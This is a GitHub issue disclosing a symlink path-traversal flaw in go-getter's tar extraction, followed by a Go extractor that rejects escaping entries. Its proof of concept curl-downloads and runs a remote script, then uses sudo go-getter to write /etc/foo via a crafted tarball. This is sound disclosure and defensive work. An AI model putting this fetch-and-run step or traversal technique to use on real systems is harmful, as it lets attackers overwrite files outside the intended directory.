go-getter allowed arbitrary filesystem access via symlinks #175

Closed
schmichael opened this issue Mar 26, 2019 · 0 comments
#171 introduced symlink support for tar archives, but unlike GNU tar did not protect against arbitrary path traversal via symlinks. A specially crafted tarball could write to any location on the filesystem the process has access to.

#174 reverted #171, but users are encouraged to ensure they are not using d9c5f68 as a library or command line tool.

go-getter 1.2.0 is safe from this path traversal issue.

Proof of concept

curl https://gist.githubusercontent.com/schmichael/12dc47df77dc210fd6c573db01f35cb1/raw/849ec6dd1e599b02bbd1428e93391d29bc301b52/write.go > write.go
go run write.go

# Show that GNU tar is safe
sudo tar xvf etc-foo.tar
# You should see an error. "etc" will exist but not "etc/foo"
rm etc

# Must run getter from another directory
gzip etc-foo.tar
mkdir tmp
cd tmp
sudo go-getter ../etc-foo.tar.gz .
sudo cat etc/foo
# Outputs "foo"
sudo cat /etc/foo
# Outputs "foo"

Script to generate tarball: https://gist.github.com/schmichael/12dc47df77dc210fd6c573db01f35cb1
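The behaviour the issue asks for is the one GNU tar shows in the PoC above: refuse a symlink whose target leaves the extraction directory, and refuse any later entry whose parent has been redirected by such a link. The extractor below is an added example written for this page; it is not go-getter's code, not the reverted #171 implementation, and not the gist linked above. Everything in it is assumed: the function names (`ExtractSafe`, `safeTarget`, `relInside`, `SampleTar`), the requirement that the destination directory already exist, and the two in-memory archives, which are constructed here (one has the same shape as the PoC tarball, symlink "etc" -> "/etc" followed by "etc/foo"; the other keeps its symlink inside the destination and must extract cleanly). The check is done twice on purpose: once lexically on the entry name, and once on disk with `filepath.EvalSymlinks` against the nearest existing ancestor, which is what catches "etc/foo" after "etc" has become a link. Hard links and device entries are rejected outright, since they are traversal vectors of their own.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

var ErrUnsafeEntry = errors.New("tar entry escapes destination") // any entry that would read or write outside dst

// relInside reports whether p is base itself or lies beneath it.
func relInside(base, p string) bool {
	rel, err := filepath.Rel(base, p)
	return err == nil && rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// safeTarget returns dst/name after a lexical check and an on-disk check that follows symlinks
// already present: the second check is what catches "etc/foo" once "etc" has become a symlink to /etc.
func safeTarget(dst, name string) (string, error) {
	target := filepath.Join(dst, name)
	if filepath.IsAbs(name) || !relInside(dst, target) {
		return "", ErrUnsafeEntry
	}
	dir := filepath.Dir(target)
	for _, err := os.Lstat(dir); err != nil; _, err = os.Lstat(dir) {
		dir = filepath.Dir(dir) // climb to the nearest existing ancestor; dst itself exists (assumed)
	}
	realDst, err := filepath.EvalSymlinks(dst)
	realDir, err2 := filepath.EvalSymlinks(dir)
	if err != nil || err2 != nil || !relInside(realDst, realDir) {
		return "", ErrUnsafeEntry
	}
	return target, nil
}

// ExtractSafe unpacks archive into the existing directory dst, refusing escaping entries and symlinks.
func ExtractSafe(archive []byte, dst string) error {
	tr := tar.NewReader(bytes.NewReader(archive))
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return nil
		} else if err != nil {
			return err
		}
		target, err := safeTarget(dst, hdr.Name)
		if err == nil {
			err = os.MkdirAll(filepath.Dir(target), 0o755)
		}
		switch {
		case err != nil:
		case hdr.Typeflag == tar.TypeDir:
			err = os.MkdirAll(target, 0o755)
		case hdr.Typeflag == tar.TypeSymlink: // absolute targets refused; relative ones resolved against the link's own directory
			if filepath.IsAbs(hdr.Linkname) || !relInside(dst, filepath.Join(filepath.Dir(target), hdr.Linkname)) {
				err = ErrUnsafeEntry
			} else {
				err = os.Symlink(hdr.Linkname, target)
			}
		case hdr.Typeflag == tar.TypeReg:
			var data []byte
			if data, err = io.ReadAll(tr); err == nil {
				err = os.WriteFile(target, data, os.FileMode(hdr.Mode)&0o777)
			}
		default: // hard links, devices and the rest are traversal vectors of their own
			err = fmt.Errorf("unsupported entry type %q", hdr.Typeflag)
		}
		if err != nil {
			return fmt.Errorf("%s: %w", hdr.Name, err)
		}
	}
}

// SampleTar is constructed test input: escaping=true mirrors the shape of the issue's PoC
// (symlink "etc" -> "/etc", then a file "etc/foo"); false keeps the link inside dst.
func SampleTar(escaping bool) []byte {
	members := map[bool][][3]string{ // name, link target, body
		true:  {{"etc", "/etc", ""}, {"etc/foo", "", "foo\n"}},
		false: {{"data/a.txt", "", "ok\n"}, {"link", "data/a.txt", ""}},
	}[escaping]
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	for _, m := range members {
		hdr := &tar.Header{Name: m[0], Linkname: m[1], Mode: 0o644, Size: int64(len(m[2])), Typeflag: map[bool]byte{false: tar.TypeReg, true: tar.TypeSymlink}[m[1] != ""]}
		if err := tw.WriteHeader(hdr); err != nil {
			panic(err)
		}
		tw.Write([]byte(m[2]))
	}
	tw.Close()
	return buf.Bytes()
}

func main() { fmt.Println(ExtractSafe(SampleTar(true), os.TempDir())) } // stand-alone demo: prints the rejection of entry "etc"
```

Run against the PoC-shaped archive the extractor stops at the first entry with `etc: tar entry escapes destination` and creates nothing, which is the counterpart of the GNU tar error the PoC shows; the benign archive extracts and `link` resolves to `data/a.txt` inside the destination. The on-disk re-check matters even for archives the lexical check passes, because a directory in the destination may already be a symlink before extraction starts.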
